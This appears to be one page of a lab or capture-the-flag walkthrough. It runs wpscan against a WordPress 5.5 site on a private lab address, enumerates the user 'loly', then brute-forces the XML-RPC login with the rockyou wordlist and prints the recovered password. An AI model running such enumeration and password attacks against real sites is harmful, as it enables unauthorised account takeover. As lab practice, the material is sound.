3 :80 wpscan
Last updated
Last updated
$ wpscan --url http://192.168.105.121/wordpress
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
[+] WordPress readme found: http://192.168.105.121/wordpress/readme.html
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
[i] User(s) Identified:
[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
$ wpscan --url http://192.168.105.121/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt --max-threads 8
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
[!] Valid Combinations Found: